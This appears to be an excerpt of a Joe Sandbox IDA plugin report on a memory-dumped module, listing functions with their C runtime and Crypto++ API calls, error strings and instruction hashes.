__CxxThrowException@8.LIBCMT ref: 6CF05B2D

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 921928366-0
Opcode ID: ce2f04bbd6127c79f3732f73f6b3b28a682784e2eff904f1f59c215070e465c2
Instruction ID: 95fda9d6eeb54479b40e03dd949311863b26d3801772bf5abbbb310f2d20e211
Opcode Fuzzy Hash: ce2f04bbd6127c79f3732f73f6b3b28a682784e2eff904f1f59c215070e465c2
Instruction Fuzzy Hash: 5F014CB2910208AFDB04DFA5D8519DE7BF8EF14744F008169E909A7E10EF70EB08CBA5

Function 6CF6F03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6CF6F047

Part of subcall function 6CF6EAE6: __getptd_noexit.LIBCMT ref: 6CF6EAE9
Part of subcall function 6CF6EAE6: __amsg_exit.LIBCMT ref: 6CF6EAF6

__amsg_exit.LIBCMT ref: 6CF6F067
__lock.LIBCMT ref: 6CF6F077
InterlockedDecrement.KERNEL32(?), ref: 6CF6F094
InterlockedIncrement.KERNEL32(05891668), ref: 6CF6F0BF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: fdc15788e38545688b9b4346929c4205b606850b0444ae7c8dbc18aaf95183ca
Instruction ID: 38ed5a92b5f92aec4eccd96aec726902d19ecd39a0f7707aeb658bd467264fd5
Opcode Fuzzy Hash: fdc15788e38545688b9b4346929c4205b606850b0444ae7c8dbc18aaf95183ca
Instruction Fuzzy Hash: 2F018036E02621FBDB919BAB84047EEB774BF06718F214105E864A7F80CB34A945DBD1

Function 6CF6F7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6CF6F7C8

Part of subcall function 6CF6EAE6: __getptd_noexit.LIBCMT ref: 6CF6EAE9
Part of subcall function 6CF6EAE6: __amsg_exit.LIBCMT ref: 6CF6EAF6

__getptd.LIBCMT ref: 6CF6F7DF
__amsg_exit.LIBCMT ref: 6CF6F7ED
__lock.LIBCMT ref: 6CF6F7FD
__updatetlocinfoEx_nolock.LIBCMT ref: 6CF6F811

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: af128a75bfb98ab7f4bb8508796a97f7aa24603850d4537c7a73494e214251a1
Instruction ID: 860d9d315aee68377e906f2ecf3e78dbb67eb8b280b926cbdf7ac034845dc122
Opcode Fuzzy Hash: af128a75bfb98ab7f4bb8508796a97f7aa24603850d4537c7a73494e214251a1
Instruction Fuzzy Hash: 90F09032945210DBEBA0ABFA9801B8EB2A06F0072CF214109E450A7FC1DB2469449AA6

Function 6CF4E6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6CF4E76F
_memcpy_s.LIBCMT ref: 6CF4E78B

Strings

, xrefs: 6CF4E85A

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-3916222277
Opcode ID: 0f4842fe80477fd527865405167ee79f3bd4ec0e6b14fd91ae53ebf93ec6397f
Instruction ID: 805e6dcf6d07373edfeac61c2bbd42fc18724007b2b6d4bed4d6abd1e7622e88
Opcode Fuzzy Hash: 0f4842fe80477fd527865405167ee79f3bd4ec0e6b14fd91ae53ebf93ec6397f
Instruction Fuzzy Hash: 2BC17D756093028FE714CF29C880A6AFBE1FFC5318F148A2DE495C7651E775EA49CB82

Function 6CF68B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6CF68C40
_memset.LIBCMT ref: 6CF68C56
_memmove.LIBCMT ref: 6CF68DA8

Strings

EncodingParameters, xrefs: 6CF68CD6

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memcpy_s_memmove_memset
String ID: EncodingParameters
API String ID: 4034675494-55378216
Opcode ID: 00a7dbaeeb89edd9191b5962796056a819d86f589a55d9dd547f91c912cd608e
Instruction ID: 2599b7e12cd96e4f780120aba7c1d0afbd30241377e89479d9e4c773905aa332
Opcode Fuzzy Hash: 00a7dbaeeb89edd9191b5962796056a819d86f589a55d9dd547f91c912cd608e
Instruction Fuzzy Hash: 799189746093819FD700CF29C880B5BBBE5AFDA708F144A2EF99887751D771E944CBA2

Function 6CF41200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 6CF5D820: _memmove.LIBCMT ref: 6CF5D930

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF413D4

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Part of subcall function 6CF38D80: _malloc.LIBCMT ref: 6CF38D8A
Part of subcall function 6CF38D80: _malloc.LIBCMT ref: 6CF38DAF

Strings

: ciphertext length of , xrefs: 6CF412E4
for this key, xrefs: 6CF41348
doesn't match the required length of , xrefs: 6CF41316

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: doesn't match the required length of $ for this key$: ciphertext length of
API String ID: 1025790555-2559040249
Opcode ID: bae44356ab9afea7ef45dae34d0cbef92d4c34036cbf2e62949db5863daf05c6
Instruction ID: e13f3d3429f3610c8f79e18dea095468d9e34750ee391b48e8273c42b8dac62a
Opcode Fuzzy Hash: bae44356ab9afea7ef45dae34d0cbef92d4c34036cbf2e62949db5863daf05c6
Instruction Fuzzy Hash: 9CA14E715083809FD325CB69D890BDBBBE9AFD9308F44891DE19D83751DB74A908CB93

Function 6CF6B47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6CF6B50D

Part of subcall function 6CF71AA0: __87except.LIBCMT ref: 6CF71ADB

Strings

pow, xrefs: 6CF6B4E5, 6CF6B502

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f0c39cd89833dbc760c64b1f7d6c6285cd5f5961127b67fa5f21f8df3bb7e8a4
Instruction ID: 107cbf9e3ec01a56899ab6dfbec17d25f053312d5a2490e7237f44679f584bfd
Opcode Fuzzy Hash: f0c39cd89833dbc760c64b1f7d6c6285cd5f5961127b67fa5f21f8df3bb7e8a4
Instruction Fuzzy Hash: 09518031F1D102C2CB116B5AD9607EA7BB4DB42718F20CD5AF4D842E98EB35C89C9756

Function 6CF18560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6CF188ED

Part of subcall function 6CF6A116: __mbstowcs_s_l.LIBCMT ref: 6CF6A12C

__cftoe.LIBCMT ref: 6CF18911

Strings

P, xrefs: 6CF18841
zX, xrefs: 6CF1865E

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: __cftoe$__mbstowcs_s_l
String ID: zX$P
API String ID: 1494777130-2079734279
Opcode ID: 923d65f2880aee79f61256fd5c46b11930912ad119bf5821ad4b12e5912c54eb
Instruction ID: fb5efa308cecc90ef7a2d8cc3ab9e5cc4c2db88eda092379e36adde155d83dea
Opcode Fuzzy Hash: 923d65f2880aee79f61256fd5c46b11930912ad119bf5821ad4b12e5912c54eb
Instruction Fuzzy Hash: B1911FB11187819FC376CF14C890BEBBBE8BB88714F508A1DE19D4B690DB716605CF92

Function 6CF389D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF38ABB
__CxxThrowException@8.LIBCMT ref: 6CF38B82

Strings

: invalid ciphertext, xrefs: 6CF38B48
PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6CF38A8E

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw
String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
API String ID: 2005118841-483996327
Opcode ID: 2643076104ae9fd0aa2b8282b803aec9407612c25b510c10a6fe1cd7f3e8e1d8
Instruction ID: 7ee7cecc67835c5fabe99825c50494f56cbe875627717ca673fe9203546b7107
Opcode Fuzzy Hash: 2643076104ae9fd0aa2b8282b803aec9407612c25b510c10a6fe1cd7f3e8e1d8
Instruction Fuzzy Hash: 39514F75104741AFD324CF55D990EABB7F8EF88708F104A1EE59A87B40DB35E909CBA2

Function 6CF36B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF36BA6

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF04067
Part of subcall function 6CF04010: _memmove.LIBCMT ref: 6CF040C8

__CxxThrowException@8.LIBCMT ref: 6CF36C56

Strings

NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6CF36B33
RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6CF36BE3

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
API String ID: 1902190269-184618050
Opcode ID: c9de86518ad0ab88438594ab542fb0ce7da086814c246b16d9267c19bf2d4cfe
Instruction ID: 5eb8e266b22a773c2d62a0f0d31b233106fa0507daef6fbeec682fd8cf7a1092
Opcode Fuzzy Hash: c9de86518ad0ab88438594ab542fb0ce7da086814c246b16d9267c19bf2d4cfe
Instruction Fuzzy Hash: FC513471208380AFD310CF69D890A5BFBF8BB99754F508A1EF49593B90D7B5D908CB52

Function 6CF04E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF04EFC
std::_Xinvalid_argument.LIBCPMT ref: 6CF04F16
_memmove.LIBCMT ref: 6CF04F6C

Part of subcall function 6CF04D90: std::_Xinvalid_argument.LIBCPMT ref: 6CF04DA9
Part of subcall function 6CF04D90: std::_Xinvalid_argument.LIBCPMT ref: 6CF04DCA
Part of subcall function 6CF04D90: std::_Xinvalid_argument.LIBCPMT ref: 6CF04DE5
Part of subcall function 6CF04D90: _memmove.LIBCMT ref: 6CF04E4D

Strings

string too long, xrefs: 6CF04EF7, 6CF04F11

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 6eb77b5f6e786802646cd6004f59421a44313d64b6706d5e4adf18a1d2d3c8b0
Instruction ID: 7a02fd016a040d263f56e31cd87415ccedd22595b15122d2e01f4d33fb581fab
Opcode Fuzzy Hash: 6eb77b5f6e786802646cd6004f59421a44313d64b6706d5e4adf18a1d2d3c8b0
Instruction Fuzzy Hash: D7311A323106105BD725DE5DE8A09AAFBEAEFF1B21720892FE555CBE40C7719C4493A1

Function 6CF02090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF0211F

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF04067
Part of subcall function 6CF04010: _memmove.LIBCMT ref: 6CF040C8

__CxxThrowException@8.LIBCMT ref: 6CF021BF

Strings

PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6CF020BD
PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6CF0215D

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
API String ID: 1902190269-1268710280
Opcode ID: 831f1c4c705857eb44657dcca48388689667e42663db9f79835bf0c5fac7c899
Instruction ID: e1c881fe32dcf70f25a9a56ed9b3387a7ab805c1c4fa03f20e9d8f2e45f26e84
Opcode Fuzzy Hash: 831f1c4c705857eb44657dcca48388689667e42663db9f79835bf0c5fac7c899
Instruction Fuzzy Hash: 4C412970C05288EFDB05DFE9D890BDDFFB8AB19714F108669E421A7B91DB745A08CB50

Function 6CF01D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF01DC9

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF04067
Part of subcall function 6CF04010: _memmove.LIBCMT ref: 6CF040C8

__CxxThrowException@8.LIBCMT ref: 6CF01E74

Strings

CryptoMaterial: this object contains invalid values, xrefs: 6CF01E16
BufferedTransformation: this object is not attachable, xrefs: 6CF01D67

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
API String ID: 1902190269-3853263434
Opcode ID: 10d59cde5fd5d64894256ab3f588cdc82a36d444f8225d4812561b5e03732faa
Instruction ID: 2c735154fe580611a3330526cb8d08bffaf1399660f5cc4257c4e11c554fa388
Opcode Fuzzy Hash: 10d59cde5fd5d64894256ab3f588cdc82a36d444f8225d4812561b5e03732faa
Instruction Fuzzy Hash: 40416B70D05248AFDB00CFE9D890BDEFBB8EB19714F10866AE425A7B90DB355A08CB50

Function 6CF374C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON

Download Yara Rule

